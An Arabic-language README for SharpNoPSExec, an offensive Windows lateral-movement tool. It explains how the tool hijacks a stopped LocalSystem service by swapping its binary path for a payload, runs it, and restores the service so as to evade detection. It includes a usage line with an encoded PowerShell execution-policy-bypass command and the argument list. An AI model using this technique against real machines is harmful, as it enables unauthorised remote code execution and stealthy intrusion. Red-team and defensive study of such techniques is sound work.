
الحصول على تنفيذ الأوامر بدون ملفات للحركة الجانبية.
يقوم SharpNoPSExec بالاستعلام عن جميع الخدمات واختيار خدمة عشوائية يكون نوع بدء تشغيلها معطلاً أو يدويًا، وحالتها الحالية متوقفة، ولديها صلاحيات LocalSystem لإعادة استخدامها.
بمجرد اختيار الخدمة، يقوم بحفظ حالتها الحالية، واستبدال مسار الثنائي (binary path) بالحمولة التي تختارها، وتنفيذها.
بعد الانتظار لمدة 5 ثوانٍ، يقوم باستعادة تكوين الخدمة، وستحصل على شيلك على الأرجح :)
هذه الأداة مستوحاة من شرح PSExec من #OSEP للحركة الجانبية، وأثناء قراءة التمرين أدركت أنه يمكنني تنفيذ الحركة الجانبية دون لمس القرص ودون إنشاء خدمة جديدة لتجنب الكشف.
███████╗██╗ ██╗ █████╗ ██████╗ ██████╗ ███╗ ██╗ ██████╗ ██████╗ ███████╗███████╗██╗ ██╗███████╗ ██████╗
██╔════╝██║ ██║██╔══██╗██╔══██╗██╔══██╗████╗ ██║██╔═══██╗██╔══██╗██╔════╝██╔════╝╚██╗██╔╝██╔════╝██╔════╝
███████╗███████║███████║██████╔╝██████╔╝██╔██╗ ██║██║ ██║██████╔╝███████╗█████╗ ╚███╔╝ █████╗ ██║
╚════██║██╔══██║██╔══██║██╔══██╗██╔═══╝ ██║╚██╗██║██║ ██║██╔═══╝ ╚════██║██╔══╝ ██╔██╗ ██╔══╝ ██║
███████║██║ ██║██║ ██║██║ ██║██║ ██║ ╚████║╚██████╔╝██║ ███████║███████╗██╔╝ ██╗███████╗╚██████╗
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═════╝
الإصدار: 0.0.3
المؤلف: Julio Ureña (PlainText)
تويتر: @juliourena
SharpNoPSExec.exe --target=192.168.56.128 --payload=""c:\windows\system32\cmd.exe /c powershell -exec bypass -nop -e ZQBjAGgAbwAgAEcAbwBkACAAQgBsAGUAcwBzACAAWQBvAHUAIQA=""
الوسائط المطلوبة:
--target= - عنوان IP أو اسم الجهاز المراد مهاجمته.
--payload= - الحمولة المراد تنفيذها على الجهاز المستهدف.
الوسائط الاختيارية:
--username= - اسم المستخدم للمصادقة على الكمبيوتر البعيد.
--password= - كلمة مرور اسم المستخدم.
--domain= - اسم المجال، إذا لم يتم تعيينه سيتم استخدام نقطة (.) بدلاً من ذلك.
--service= - الخدمة المراد تعديلها لتنفيذ الحمولة، بعد اكتمال الحمولة سيتم استعادة الخدمة.
ملاحظة: إذا لم يتم تحديد خدمة، سيبحث البرنامج عن خدمة عشوائية لتنفيذها.
ملاحظة: إذا كانت الخدمة المحددة تستخدم حسابًا غير نظامي، فسيتم تجاهلها.
--help - طباعة معلومات المساعدة.